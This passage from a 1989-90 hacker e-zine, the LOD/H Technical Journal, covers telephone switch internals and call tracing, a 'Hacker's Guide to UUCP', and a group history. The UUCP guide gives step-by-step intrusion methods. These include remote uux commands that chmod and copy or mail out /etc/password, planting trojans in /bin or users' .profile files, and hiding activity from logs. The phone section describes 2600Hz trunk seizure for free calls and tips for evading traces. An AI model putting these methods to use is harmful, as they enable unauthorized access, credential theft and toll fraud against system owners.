(Mechanized Loop Testing) is another popular one. This system is often available through the LMOS data base and can give very specific measurements of line levels and losses. The "TV Mask" is also popular giving the user the ability to monitor lines via a call back number. DAMT (Direct Access Mechanized Testing) is used by line repairmen to put tone on numbers to help them find lines. This was previously done by Frame personnel, so DAMT automated that task. DAMT can also monitor lines, but unfortunately, the audio is scrambled in a manor that allows one only to tell what type of signal is present on the line, or whether it is busy or not. All of these testing systems have one thing in common: they access the line through a "No Test Trunk". This is a switch which can drop in on a specific path or line and connect it to the testing device. It depends on the device connected to the trunk, but there is usually a noticeable "click" heard on the tested line when the No Test Trunk drops in. Also the testing devices I have mentioned here will seize the line, busying it out. This will present problems when trying to monitor calls, as you would need to drop in during the call. The No Test Trunk is also the method in which operator consoles perform verifications and interrupts. ** INTEROFFICE SIGNALLING ** Calls coming into and leaving the switch are routed via trunks. The switches select which trunk will route the call most effectively and then retransmits the dialed number to the distant switch. There are several different ways this is done. The two most common are Loop Signaling and CCIS, Common Channel Interoffice Signaling. The predecessor to both of these is the famous and almost extinct "SF Signaling". This utilized the presence of 2600hz to indicate trunks in use. If one winks 2600Hz down one of these trunks, the distant switch would think you hung up. Remove the 2600, and you have control of the trunk and you could then MF a number. This worked great for years. Assuming you had dialed a toll free number to begin with, there was no billing generated at all. The 1AESS does have a program called SIGI that looks for any 2600 winks after the original connection of a toll call. It then proceeds to record on AMA and output any MF digits received. For more information on AMA see Phantom Phreaker's article entitled, Understanding Automatic Message Accounting in the LOD/H TJ Issue #3. However due to many long distant carriers using signaling that can generate these messages it is often overlooked and "SIG IRR" output messages are quite common. Loop signaling still uses MF to transmit the called number to distant switches, however, the polarity of the voltage on the trunk is reversed to indicate trunk use. CCIS sometimes referred to CCS#6 uses a separate data link sending packets of data containing information regarding outgoing calls. The distant switch monitors the information and connects the correct trunk to the correct path. This is a faster and more efficient way of call processing and is being implemented everywhere. The protocol that AT&T uses is CCS7 and is currently being accepted as the industry standard. CCS6 and CCS7 are somewhat similar. Interoffice trunks are multiplexed together onto one pair. The standard is 24 channels per pair. This is called T-1 in it's analog format and D-1 in its digital format. This is often referred to as carrier or CXR. The terms frame error and phase jitter are part of this technology which is often a world in itself. This type of transmission is effective for only a few miles on twisted pair. It is often common to see interoffice repeaters in manholes or special huts. Repeaters can also be found within C.O.s, amplifying trunks between offices. This equipment is usually handled by the "carrier" room, often located on another floor. Carrier also handles special circuits, private lines, and foreign exchange circuits. After a call reaches a Toll Switch, the transmit and receive paths of the calling and called party are separated and transmitted on separate channels. This allows better transmission results and allows more calls to be placed on any given trunk. This is referred to as 4 wire switching. This also explains why during a call, one person can hear crosstalk and the other cannot. Crosstalk will bleed over from other channels onto the multiplexed T-Carrier transmission lines used between switches. ** CALL TRACING So with the Loop Signaling standard format there is no information being transmitted regarding the calling number between switches. This therefore causes the call tracing routine to be at least a two step process. This is assuming that you are trying to trace an anticipated call, not one in progress. When call trace "CLID" is placed on a number, a message is output every time someone calls that number. The message shows up on most of the ESS output channels and gives information regarding the time and the number of the incoming trunk group. If the call came from within that office, then the calling number is printed in the message. Once the trunk group is known, it can usually be determined what C.O. the calls are coming from. This is also assuming that the calls are coming from within that Bell company and not through a long distance carrier (IEC). So if Bell knows what C.O. the calls are coming from, they simply put the called number on the C.I. list of that C.O. Anytime anyone in that C.O. calls the number in question another message is generated showing all the pertinent information. Now if this were a real time trace it would only require the assistance of the SCC and a few commands sent to the appropriate switches (i.e. NET-LINE). This would give them the path and trunk group numbers of the call in progress. Naturally the more things the call is going through, the more people that will need to be involved in the trace. There seems to be a common misconception about the ability to trace a call through some of the larger packet networks i.e. Telenet and TYMNET. Well I can assure you, they can track a call through their network in seconds (assuming multiple systems and/or network gateways are not used) and then all that is needed is the cooperation of the Bell companies. Call tracing in itself it not that difficult these days. What is difficult is getting the different organizations together to cooperate. You have to be doing something relatively serious to warrant tracing in most cases, however, not always. So if tracing is a concern, I would recommend using as many different companies at one time as you think is necessary, especially US Sprint, since they can't even bill people on time much less trace a call. But...it is not recommended to call Sprint direct, more on that in the Equal Access section. ** EQUAL ACCESS The first thing you need to understand is that every IEC Inter Exchange Carrier (long distance company) needs to have an agreement with every LEC Local Exchange Carrier (your local phone company) that they want to have access to and from. They have to pay the LEC for the type of service they receive and the amount of trunks, and trunk use. The cost is high and the market is a zoo. The LECs have the following options: - Feature Group A - This was the first access form offered to the IECs by the LECs. Basically whenever you access an IEC by dialing a regular 7 digit number (POTS line) this is FGA. The IECs' equipment would answer the line and interpret your digits and route your call over their own network. Then they would pick up an outgoing telephone line in the city you were calling and dial your number locally. Basically a dial in, dial out situation similar to Telenet's PC pursuit service. - Feature Group B - FGB is 950-xxxx. This is a very different setup from FGA. When you dial 950, your local switch routes the call to the closest Access Tandem (AT) (Toll Switch) in your area. There the IECs have direct trunks connected between the AT and their equipment. These trunks usually use a form of multiplexing like T-1 carrier with wink start (2600Hz). On the incoming side, calls coming in from the IEC are basically connected the same way. The IEC MFs into the AT and the AT then connects the calls. There are many different ways FGB is technically setup, but this is the most common. Tracing on 950 calls has been an area of controversy and I would like to clear it up. The answer is yes, it is possible. But like I mentioned earlier, it would take considerable manpower which equals expensive to do this. It also really depends on how the IEC interface is set up. Many IECs have trunks going directly to Class 5 end offices. So, if you are using a small IEC, and they figure out what C.O. you are calling from, it wouldn't be out of the question to put CLID on the 950 number. This is highly unlikely and I have not heard from reliable sources of it ever being done. Remember, CLID generates a message every time a call is placed to that number. Excessive call trace messages can crash a switch. However, I should mention that brute force hacking of 950s is easily detected and relatively easy to trace. If the IEC is really having a problem in a particular area they will pursue it. - Feature Group C - FGC is reserved for and used exclusively by AT&T. - Feature Group D - FGD is similar to FGB with the exception that ANI is MF'ed to the IEC. The end office switch must have Equal Access capability in order to transmit the ANI. Anything above a X-bar can have it. FGD can only be implemented on 800 numbers and if an IEC wants it, they have to buy the whole prefix. For a list of FGD prefixes see 2600 Magazine. You should also be aware that MCI, Sprint, and AT&T are offering a service where they will transmit the ANI to the customer as well. You will find this being used as a security or marketing tool by an increasing amount of companies. A good example would be 800-999-CHAT. ** OUTPUT MESSAGES ** The following is a compiled list of common switch messages. The list was compiled from various reference materials that I have at my disposal. 1AESS COMMON OUTPUT MESSAGES -------------------------------------- MSG. DESCRIPTION ---------------------------------------------------------------- ** ALARM ** AR01 Office alarm AR02 Alarm retired or transferred AR03 Fuse blown AR04 Unknown alarm scan point activated AR05 Commercial power failure AR06 Switchroom alarm via alarm grid AR07 Power plant alarm AR08 Alarm circuit battery loss AR09 AMA bus fuse blown AR10 Alarm configuration has been changed (retired,inhibited) AR11 Power converter trouble AR13 Carrier group alarm AR15 Hourly report on building and power alarms ** AUTOMATIC TRUNK TEST ** AT01 Results of trunk test ** CARRIER GROUP ** CG01 Carrier group in alarm CG03 Reason for above ** COIN PHONE ** CN02 List of pay phones with coin disposal problems CN03 Possible Trouble CN04 Phone taken out of restored service because of possible coin fraud ** COPY ** COPY Data copied from one address to another ** CALL TRACE ** CT01 Manually requested trace line to line, information follows CT02 Manually requested trace line to trunk, information follows CT03 Intraoffice call placed to a number with CLID CT04 Interoffice call placed to a number with CLID CT05 Call placed to number on the CI list CT06 Contents of the CI list CT07 ACD related trace CT08 ACD related trace CT09 ACD related trace ** DIGITAL CARRIER TRUNK ** DCT COUNTS Count of T carrier errors ** MEMORY DIAGNOSTICS ** DGN Memory failure in cs/ps diagnostic program ** DIGITAL CARRIER "FRAME" ERRORS ** FM01 DCT alarm activated or retired FM02 Possible failure of entire bank not just frame FM03 Error rate of specified digroup FM04 Digroup out of frame more than indicated FM05 Operation or release of the loop terminal relay FM06 Result of digroup circuit diagnostics FM07 Carrier group alarm status of specific group FM08 Carrier group alarm count for digroup FM09 Hourly report of carrier group alarms FM10 Public switched digital capacity failure FM11 PUC counts of carrier group errors ** MAINTENANCE ** MA02 Status requested, print out of MACII scratch pad MA03 Hourly report of system circuits and units in trouble MA04 Reports condition of system MA05 Maintenance interrupt count for last hour MA06 Scanners,network and signal distributors in trouble MA07 Successful switch of duplicated unit (program store etc.) MA08 Excessive error rate of named unit MA09 Power should not be removed from named unit MA10 OK to remove paper MA11 Power manually removed from unit MA12 Power restored to unit MA13 Indicates central control active MA15 Hourly report of # of times interrupt recovery program acted MA17 Centrex data link power removed MA21 Reports action taken on MAC-REX command MA23 4 minute report, emergency action phase triggers are inhibited ** MEMORY ** MN02 List of circuits in trouble in memory ** NETWORK TROUBLE ** NT01 Network frame unable to switch off line after fault detection NT02 Network path trouble Trunk to Line NT03 Network path trouble Line to Line NT04 Network path trouble Trunk to Trunk NT06 Hourly report of network frames made busy NT10 Network path failed to restore ** OPERATING SYSTEM STATUS ** OP:APS-0 OP:APSTATUS OP:CHAN OP:CISRC Source of critical alarm, automatic every 15 minutes OP:CSSTATUS Call store status OP:DUSTATUS Data unit status OP:ERAPDATA Error analysis database output OP:INHINT Hourly report of inhibited devices OP:LIBSTAT List of active library programs OP:OOSUNITS Units out of service OP:PSSTATUS Program store status ** PLANT MEASUREMENTS ** PM01 Daily report PM02 Monthly report PM03 Response to a request for a specific section of report PM04 Daily summary of IC/IEC irregularities ** REPORT ** REPT:ADS FUNCTION Reports that a ADS function is about to occur REPT:ADS FUNCTION DUPLEX FAILED No ADS assigned REPT:ADS FUNCTION SIMPLEX Only one tape drive is assigned REPT:ADS FUNCTION STATE CHANGE Change in state of ADS REPT:ADS PROCEDURAL ERROR You fucked up REPT:LINE TRBL Too many permanent off hooks, may indicate bad cable REPT:PROG CONT OFF-NORMAL System programs that are off or on REPT:RC CENSUS Hourly report on recent changes REPT:RC SOURCE Recent change system status (RCS=1 means RC Channel inhibited) ** RECENT CHANGE ** RC18 RC message response ** REMOVE ** RMV Removed from service ** RESTORE ** RST Restored to service status ** RINGING AND TONE PLANT ** RT04 Status of monitors ** SOFTWARE AUDIT ** SA01 Call store memory audit results SA03 Call store memory audit results ** SIGNAL IRREGULARITY ** SIG IRR Blue box detection SIG IRR INHIBITED Detector off SIG IRR TRAF Half hour report of traffic data ** TRAFFIC CONDITION ** TC15 Reports overall traffic condition TL02 Reason test position test was denied TL03 Same as above ** TRUNK NETWORK ** TN01 Trunk diagnostic found trouble TN02 Dial tone delay alarm failure TN04 Trunk diag request from test panel TN05 Trunk test procedural report or denials TN06 Trunk state change TN07 Response to a trunk type and status request TN08 Failed incoming or outgoing call TN09 Network relay failures TN10 Response to TRK-LIST input, usually a request from test position TN11 Hourly, status of trunk undergoing tests TN16 Daily summary of precut trunk groups ** TRAFFIC OVERLOAD CONDITION ** TOC01 Serious traffic condition TOC02 Reports status of less serious overload conditions ** TRANSLATION ** (shows class of service, calling features etc.) TR01 Translation information, response to VFY-DN TR03 Translation information, response to VFY-LEN TR75 Translation information, response to VF:DNSVY ** ** TW02 Dump of octal contents of memory 1AESS COMMON INPUT MESSAGES ------------------------------------- Messages always terminate with ". ctrl d " x=number or trunk network # MSG. DESCRIPTION ------------------------------------------------------------------------ NET-LINE-xxxxxxx0000 Trace of path through switch NET-TNN-xxxxxx Same as above for trunk trace T-DN-MBxxxxxxx Makes a # busy TR-DEACTT-26xxxxxxx Deactivates call forwarding VFY-DNxxxxxxx Displays class of service, calling features etc. VFY-LENxxxxxxxx Same as above for OE VFY-LIST-09 xxxxxxx Displays speed calling 8 list ************************************************************************ There are many things I didn't cover in this article and many of the things I covered, I did so very briefly. My intention was to write an article that explains the big picture, how everything fits together. I hope I helped. Special thanks to all the stupid people, for without them some of us wouldn't be so smart and might have to work for a living. Also all the usual Bell Labs, AT&T bla bla bla etc. etc. I can usually be reached on any respectable board, ha! Agent Steal Inner (C)ircle 1989 !!!!! !!!!! FREE KEVIN MITNICK !!!!! !!!!! [End Of Article] The LOD/H Technical Journal, Issue #4: File 05 of 10 ===================================================== || || || A Hacker's Guide to UUCP || || || || by || || || || The Mentor || || || || Legion of Doom/Hackers || || || || 08/04/89 || || || DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD Scope DDDDD Part I of this file is intended for the casual hacker- someone familiar with UNIX commands, but who hasn't had extended experience with the UUCP network. Part II will be intended for the advanced hacker who has the confidence and knowledge to go out and modify a UNIX network- the logs, the paths, the permissions, etc... Introduction DDDDDDDDDDDD Like it or not, UNIX is the most popular operating system in the world. As a hacker, you are likely to run into several hundred UNIX machines over the course of your hacking career. Knowing how to move around and use the UNIX environment should be considered absolutely essential, especially since UNIX is the operating system of choice among phone company computers. This article is not an attempt to teach you how to use UNIX. If you don't know what a '$ls -x > dir' does, you need to put this article in your archives, get a good basic file on UNIX (or buy a book on it- there are several good ones out ((see the Bibliography at the end of this file for suggestions))), read it, and then play around some in a UNIX machine. Please! If you have managed to stumble into a Bell system, do *not* use it as a machine to learn UNIX on! You *will* get noticed by security, and this will lead not only to the security being tightened, but may well lead to Bell Security going through your underwear drawer. The information in this article is mainly concerning AT&T System V UNIX. I have included BSD 4.3 & Xenix information also in cases that I was able to determine alternate procedures. All information has been thoroughly tested and researched on as many machines as possible. Standard disclaimer, your system may be slightly different. Glossary & Usage DDDDDDDDDDDDDDDD BNU - Basic Networking Utilities. System V.3's uucp package. daemon - A program running in the background. LAN - Local Area Network. network - A group of machines set up to exchange information and/or resources. node - A terminating machine on a network. UUCP - When capitalized, refers to the UNIX networking utilities package. uucp - In lower case, refers to the program Unix-to-Unix-CoPy. I. General Information DDDDDDDDDDDDDDDDDDD A. What is UUCP? UUCP is a networking facility for the UNIX operating system. It is made up of a number of different programs that allow UNIX machines to talk to each other. Using UUCP, you can access a remote machine to copy files, execute commands, use resources, or send mail. You can dial out to other non-UNIX computers, and you can access public mail/news networks such as USENET. B. History of UUCP The first UUCP system was built in 1976 by Mike Lest at AT&T Bell Labs. This system became so popular that a second version was developed by Lesk, David Nowitz, and Greg Chesson. Version 2 UUCP was distributed with UNIX Version 7. With System V Release 3, a new version of UUCP that was developed in 1983 by Peter Honeyman, David A. Nowitz, and Brian E. Redman. This version is known as either HoneyDanBer UUCP (from the last names of the developers), or more conventionally as Basic Networking Utilities (BNU). I will stick with BNU, as it is easier to type. BNU is backward compatible with Version 2, so there is no problem communicating between the two. BSD 4.3's UUCP release incorporates some of the BNU features, but retains more similarity to Version 2 UUCP. If you are unsure about which version of UUCP is on the system that you are in, do a directory of /usr/lib/uucp and look at the files. If you have a file called L.sys, you are in a Version 2 system. If there is a file called Systems, then it's BNU. See Table 1 for a fairly complete listing of what system runs what UUCP version. Table 1* DDDDDDD Manufacturer Model UNIX/UUCP Version _____________________________________________________________ | | | | | Apollo | 3000 Series (Domain) | BSD 4.2/Version 2| | Altos | All models | Xenix/Version 2 | | AT&T | 3B1 (UNIX PC) | System V.2/Vers.2| | AT&T | 3B2 | System V.3/BNU | | AT&T | 3B15 | System V.3/BNU | | Convergent | Miniframe (CTIX) | System V.2/Vers.2| | Technologies | Mightframe (CTIX) | System V.3/BNU | | DEC | MicroVAX | Ultrix/Vers. 2 + | | DEC | VAX | BSD 4.3/Vers. 2 +| | Encore | Multimax | System V.3/BNU | | IBM | PC-RT (AIX) | System V.2/Vers.2| | Masscomp | MC-5000 Series | System V.3/BNU | | Microport | PC/AT | System V.2/Vers.2| | NCR | Tower 32/16 | System V.2/Vers.2| | Prime | EXL Series | System V.2/Vers.2| | Pyramid | 90x | BSD 4.2/Version 2| | SCO/Xenix | PC/XT | System V.2/Vers.2| | Unisys | 5000 & 7000 Series | System V.2/Vers.2| | | | | DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD * This table is slightly outdated. Some of the systems may have upgraded since this article was written. II. UUCP Communications DDDDDDDDDDDDDDDDDDD A. Overview of UUCP User Programs There are a number of programs that are used by a UUCP communication network. Some are standard UNIX programs, others are exclusively part of the UUCP package. ................................................................. These three are standard UNIX commands: mail- UNIX's mail facility can be used to send messages to other systems on a UUCP network. cu- Connects you to a remote machine and allows you to be logged in simultaneously to both machines. Also allows you execute commands on either machine without dropping the link. tip- (BSD) same as cu. +++ There are five main programs within UUCP: uucp- Does all the setup for a remote file transfer. uucp creates files that describe the file transfer (called 'work' files), then calls the uucico daemon to do the actual work. uux- Used to execute commands on a remote machine. uux performs similar to uucp, except that commands are processed instead of files. uuname- Used to list the names of other systems that are connected to your network. uulog- Displays the uucp log for the specified machine. I'll be showing how to cover your uucp tracks from this later in the article. uustat- Gets the status of uux requests. Also lets you manipulate the contents of a UUCP queue. +++ System V also has two additional programs: uuto- Allows you to send files to another user similar to the UNIX mail command. uupick- Allows you to read files sent to you with uuto. +++ BSD 4.3 has two additional programs: uuq- Lets you view & manipulate UUCP jobs that are waiting to be processed, similar to System V's uupick program. uusend- Lets you forward files through a string of systems. .................................................................. III. Using the Programs DDDDDDDDDDDDDDDDDD A. uuname This one is easy & friendly. All you do is type '$uuname'. It will spit out a list of all systems on your network. If you aren't sure about the name of your local system, invoke uuname with the -l option. ($uuname -l). B. mail I'm not going to say to much about mail, as it isn't a program that you will use much as a hacker except possibly to break out of a shell. Sending mail to other people is not a good way to stay hidden, as all mail transfer to remote systems is logged (no, they may not read the mail, but they're likely to notice that the unassigned ADMIN account is suddenly getting mail from all over the world...) These logs can be modified, however. This will be covered in Part II. Briefly, mail is invoked with the command 'mail username' (or mailx under some systems). If you wish to send mail to user john on the system you're on, you would type: mail john Dear John- This is mail. Enjoy it. ^D (usage note, this means control-D) To send mail to a user on a remote system, or a string of systems, you would use the ! key to indicate a remote system name. If you were on node Alpha and wanted to send mail to john on node Beta, you would address your mail to 'mail Beta!john'. If you wanted to send mail to a user on system that's not connected to yours, but *is* connected to a machine you are connected to, you would string together the system names, separated by a !. For example, if node Saturn was connected to Beta, but not to Alpha, you could send mail to susan on Saturn with 'mail Beta!Saturn!susan'. Please note- If you are running the C-Shell or Bourne Shell, you will have to prefix the ! with a X. i.e. 'mail BetaX!SaturnX!susan'. Also, the mail header displays the system name, return path, and account name that you send mail from, so don't try to anonymously mail someone a message- it won't work. Another quick feature (this is under the 'basic unix knowledge' category), if you want to mail a file named 'message' to someone, you'd type the following - '$mail Beta!Saturn!susan < message'. Finally, as mentioned above, it may be possible to break out of a restricted shell within mail. Simply send mail to yourself, then when you enter mail to read the message, type !sh to exit from mail into shell. This will often blow off the restricted shell. C. File Transfer One of the first things that you will want to do when you discover that you're on a network (uuname, remember?) is to grab a copy of the /etc/password file from the systems on the net then run Shooting Shark's password hacking program from TJ Issue #2. Even if you have no use for it now, save it & label it, you never know when you might need to get into that system. Besides, when printed, they make fun & interesting wallpaper. Unfortunately, the /etc/ directory will sometimes have access restricted. You can get around this by copying the /etc/password file to the /usr/spool/uucppublic directory using the uux command (see below). If the uux program has restrictions on in, then you may have to actually hack into the remote system using the rlogin command. Be persistent. UUCP is also useful in that it allows you to send a file from your system to a remote system. Got a nice little trojan you need to insert on their system? Use UUCP to drop it into the /bin/ directory. Or if they protected the /bin/ directory (likely, if they have half a brain), they might have forgotten to protect all of the users private directories (i.e. /usr/mike or /usr/susan or sometimes even /usr/admin). UUCP a copy of a .profile file to your system, insert your own stuff in it, then UUCP it back to its original directory where the user will access it the next time he logs in. People rarely $cat their .profile file, so you can usually get away with murder in them. While uucp has some limitations, it has the advantage of being present on every UUCP system in the world. If you're on a System V, you will probably use uuto & uupick much more frequently, as it's easier to do subtle hacks with them. But if uucp is all you have, remember, you're a hacker. Show some ingenuity. The syntax of uucp when sending a file is: $uucp [options] For example, you have a program sitting in your working directory on node Alpha called 'stuff', and you want to plop it into the /usr/spool/uucppublic/mike/ directory of node Beta. The command would be '$uucp stuff Beta!/usr/spool/uucppublic/mike/'. (Don't forget to add a slash in front of the exclamation point if you're in C-Shell or Bourne!) A good thing to know that will save you some typing is that the /usr/spool/uucppublic/ directory can be abbreviated as D/ (in KSH only), so that the above command could look like '$uucp stuff Beta!D/mike/'. You can also specify a path other than D/. If you wish to drop your 'new & improved' version of the /etc/password file into the /etc/ directory, you could do a '$uucp password Beta!/etc/'. Just don't be surprised if it gets bounced with a message similar to the following: From uucp Sat Dec 24 23:13:15 1988 Received: by Beta.UUCP (2.15/3.3) id AA25032; Sat Dec 24 23:13:15 edt Date: Sat Dec 24 23:13:15 edt From: uucp Apparently to: hacker Status: R file /etc/password, system Beta remote access to path/file denied Another hacker-friendly feature of UUCP is the ability to copy something into a remote user's login directory by entering a D character before the username. For example, to dump a modified .profile file into a user on Beta named alex, you would do the following: '$uucp .profile Beta!Dalex' The syntax for uucp when receiving a remote file is: $uucp [options] For example, you wish to grab Beta's password file and put it in a subdirectory called tmp in the account 'hacker' on node Alpha. The command would be: '$uucp Beta!/etc/password Alpha!/usr/hacker/tmp/'. The same things concerning use of tildes (D) demonstrated in sending files applies when receiving them. The following table contains valid options to the uucp command. Table 2 DDDDDDD _________________________________________________ | | | -C Copy the local source file to the spool | | directory before attempting the trans- | | fer. | | | | -f If the directory doesn't exist, abort the | | transfer. Normally uucp will create any | | non-existent directories, which is bad | | technique if you're a good hacker... | | | | -j Display the UUCP job request number. This | | is useful if you're going to use uustat | | to manipulate & reroute UUCP requests in | | the queue. | | | | -m Notify sender by mail when copy is done. | | Potentially hazardous, as incoming mail | | is logged. Later on I'll show how to | | modify that log... | | | | -n Notify the user specified on | | the remote system when the xfer is done. | | I assume everyone sees how foolish this | | would be, right? | | | | -r Queue the job, but do not contact remote | | system immediately. Can't see any pros | | or cons in using this one... | | | | -s Pipe the UUCP status messages | | to filename. Useful if you wish to log | | off & then check the progress later. | | | DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD D. Executing Remote Commands The uux program allows users to execute a program on another system on the network. While in theory this is the most useful command a hacker can use, in practice it is usually heavily restricted- any system administrator with half a brain realizes that letting people execute any command they like from across the country is not the way to maintain system integrity. There are, however, some useful things that can be done with uux even if the sysadmin has protected the things that *he* thinks are dangerous (remember, he's not a hacker, you are. You are smarter, more persistent, and much cleverer than he is. He doesn't like coming to work every day, can't wait to leave, and will do the minimum possible to get by. You're different. You're dedicated & tricky. You *like* what you're doing. If you don't, get the hell out & let others who do take over. End of the pep talk.) The format for the uux command is: $uux [options] command-string. See Table 3 below for a list of options. Ok, ideal case. The System manager of Beta is an idiot who has left all possible commands open, and the uucico daemon has root privs. Let's say you want to alter the protection of the password file, copy it into the D/ (public, remember?) directory, then copy it over to your system. The sequence of commands would be: $uux Beta!chmod 777 /etc/password $uux Beta!cp /etc/password /usr/spool/uucppublic/info.txt $uucp Beta!D/info.txt /usr/hacker/ The first line would modify the protection where anyone could get to it, the second line would copy it into the D/ directory, and the third line would send it along to you. Unfortunately, most commands are disabled (useful ones like chmod and cat and ls, at least.) But sometimes you can get around that. For instance, often you might not be able to ls or cp the password file. But very rarely will mail be disabled. So if you wanted a copy of the password file, you have them mail you one: $uux Beta!mail Alpha!hacker < /etc/password Later in the UUCP Administration section, I'll explain how to modify the remote system so any command you want is executable. When you execute a remote command, UUCP will automatically send you mail telling you how it went. It's a good idea to check the logs and see if there's anything you need to remove to cover your presence (this subject will be covered in Part II). If you are executing a command that is going to need data from a file, you specify that the file is on your local system by prefacing it with a X!. I can't think of many reasons to use this, but perhaps you can. As an example, let's say you wanted to print a file in your directory called 'stuff' out on a remote laser printer (bad hacking practice, and difficult to retrieve.) Do this: $uux Beta!lp -dlaser X!stuff If the command you want to execute (whodo in this example) is forbidden, you will get a notification message similar to the following: >From uucp Sat Dec 24 23:12:15 EDT 1988 >From uucp Sat Dec 24 23:12:13 EDT 1988 remote from Beta Status: R0 uuxqt cmd (whodo) status (DENIED) If you are going to need the standard output for a command, pipe it into D/. And any files or processes created by uux will belong to the user uucp, not to you. Table 3 DDDDDDD __________________________________________________________ | | | -a Notify user username when completed. | | | | -b Print the Standard Input when the exit status | | indicates an error. | | | | -c Do not copy files to the spool directory (I | | recommend this one...too big a chance of someone | | glancing in the spool dir. | | | | -g Sets the priority of the transfer. | | The lower alphabetically or numerically that | | the char or num is, the faster the process will | | be executed. i.e. -ga or -g2 will go faster | | than -gr or -g8. | | | | -j Print the UUCP job number. Useful if you're | | going to be playing with the queue. | | | | -I (BSD Only) Make a link from the original file to | | the spool dir. I'm not sure what this is for. | | | | -L (BSD Only) Start up the uucico daemon. | | | | -n Don't notify by mail. Recommended if you don't | | have the authority or knowledge to modify the | | system mail logs. | | | | -p Use Standard Input | | | | -r Queue the job but don't start uucico. | | | | -s Send transfer status to file filename. | | | | -x<0..9> Set level of debugging information. | | | DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD E. uustat & uulog These two programs are used to track UUCP jobs and examine their status. uustat prints out a one-line summary for each job, telling you if the job is finished or the job is queued. Older versions of uustat will have the job state as either JOB DELETED or JOB IS QUEUED. The output of uustat will look like the following: $uustat 1001 hacker Alpha 10/31-09:45 10/31-10:15 JOB IS QUEUED 1002 hacker Alpha 10/30-08:15 10/30-11:25 COPY FINISHED | | | | | | | | | | | | job # user node start-time status-time job-status See Table 4 for a list of options for the uustat command. uulog is a more thorough version of uustat, as it tracks the status messages logged by the system as your job proceeded through the system. See Table 5 for options of the uulog command. Table 4* DDDDDDD _________________________________________________ | | | -a report all queued jobs. | | | | -k kill job # job#. | | | | -m report if another system is accessible. | | | | -q report the number of jobs queued for | | all systems on the net. | | | | -s report the status of jobs for | | the system named systemname. | | | | -u report the status of jobs for | | user username. | | | DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD * There are several other options such as -o and -y that are system specific, and aren't really that useful to begin with. Table 5 DDDDDDD ______________________________ | | | -s same as uustat | | | | -u same as uustat | | | DDDDDDDDDDDDDDDDDDDDDDDDDDDDDD ****************************************************************** This marks the end of Part I. If time permits a Part II will be in the next LOD/H Technical Journal. (c) 1989 The Mentor Legion of Doom/Legion of Hackers ****************************************************************** The LOD/H Technical Journal, Issue #4: File 06 of 10. The History of LOD/H Revision #3 May 1990 written by Lex Luthor NOTES: I approximated all dates, as my records are not totally complete. If I left anyone out or put someone in that shouldn't be in, sorry I tried and did spend considerable time researching the dates and BBS files, the old LOD BBS software, etc. Revisions one and two were released to LOD/H members only. Some information may only be relevant to those who were around at the time. The primary purpose of this article is simply to present an accurate picture of events and people who have been associated with this group. The reputation of many groups and many people have been tainted by slanderous remarks made by uninformed law enforcement and justice department personnel, the media, and other hackers. I find this sad, but it's a fact of life that must be endured. All that can be done in this article is to attempt to present the facts as I see them. Due to the wild and unfounded accusations by said persons, today LOD is viewed more as malicious criminals than as for what it was viewed as in the past. That is, of a group of people who put themselves at risk to help inform others. Of course this is a prettier picture than most want to believe, and is slightly prettier than what it is in actuality, but the ideal is there. Whenever a group of individuals get together, you cannot forget that they are individuals. These individuals can and do make mistakes in judgement in some cases. But also, they have been and continue to be victimized by law enforcement and said others. Over the years I have collected tens of newspaper and magazine articles about "The LOD", myself, and others with not a one being perfectly accurate. You have heard it before: don't believe everything you read. That goes for this article also, although I have made an honest attempt at ensuring that it is truthful and accurate, as Ripley said: believe it, or not. I have been "retired" for quite some time now. My definition of retired is simply that of keeping my activities to those of a strictly legitimate nature. It is quite funny yet pitiful to here people say, "once a crook always a crook" AND BELIEVE IT! That statement is a fallacy. Nearly everyone has done something wrong when they were young yet many grow up to become the so called normal, law abiding citizens that society says we should be. At this point in time and in the foreseeable future, the risks of exploring and learning about telephone and computer networks in a less than legitimate fashion outweigh the benefits. I think many of the older hackers have adopted this philosophy out of necessity. This decision is even easier after reflecting on the events of which I have seen during the course of my "career". Those events are primarily those of seeing people's rights being violated by law enforcement. Their privacy being forsaken by the media. I do not dispute however, that some hackers have done these same things to other hackers and other people. Neither side is right or fair so I suppose it is time to exit since it's getting too hot in the kitchen. I will remain however, in an advisory capacity to the Technical Journal and group for as long as they continue exist. If you are to believe the rumors, LOD has been dead many times, again untrue. The main drawback of becoming a BBS hermit is how the rumors start to accrue as time progresses. I have been "busted" perhaps a hundred times if you believe every rumor. The fact is that I have never been visited let alone busted. I have seen many people get into trouble due to their own carelessness. Those who have remained unmolested by the authorities are either very careful and paranoid, or are helping them catch others. I have been extremely careful and exceedingly paranoid, period. Now that I have harassed the reader with my comments regarding the whole hacking/phreaking experience, I present the story. Please note that I realize many people could care less about all this, and if you are in that category you can always throw this into the shredder, now. But, there is a sufficient number of people who actually are curious to get the real story on this stuff so here it is, presented to correct the many inaccuracies which have surfaced over the years and also for the sake of posterity. _____________________________________________________________________________ During the winter break from school in late 1983, I took a trip up to Long Island, NY to visit Quasi Moto. I had met him in south Florida, and he had since moved. He decided to put up a BBS, and while visiting him, we worked on it. For those who do not remember, its name was PLOVERNET. PLOVERNET was considered a resurrected OSUNY by some since some users migrated to PLOVERNET after OSUNY went down, at least in part, by an article in Newsweek mentioning it. A new hacker magazine, 2600, started posting advertisements on various boards. I had been in contact with Emmanuel Goldstein, the editor of 2600, on Pirates Cove, another 516 BBS. I gave him the number to PLOVERNET and due to the large amount of users, (500, of which 70% were relatively active) 2600 had plenty of response. PLOVERNET went online in January of 1984 and shortly thereafter it was the busiest BBS around. It was so busy in fact, that a long distance service called LDX had stopped connecting people who dialed 516-935-2481 which was PLOVERNET's number. Now remember, this is early 1984 here. The practice of blocking calls to a certain number wasn't really done by common carriers until 1986/87 with the emergence of new security software and audit trail information. I picked the best phreaks and hackers from PLOVERNET and invited them onto the newly created LOD BBS. LOD was one of the first boards which upon connection did nothing until you entered the primary password, and there was no new user routine as the board was invitation only. Again, this was back in early 1984. It was a fairly original albeit paranoid practice at the time, and many boards subsequently adopted the technique as security became an increasing concern. Various groups had started forming such as Fargo 4A and Knights of Shadow. I was admitted into Knights of Shadow in early 84. After suggesting some promising new phreaks/hacks for membership and being turned down because they were not well 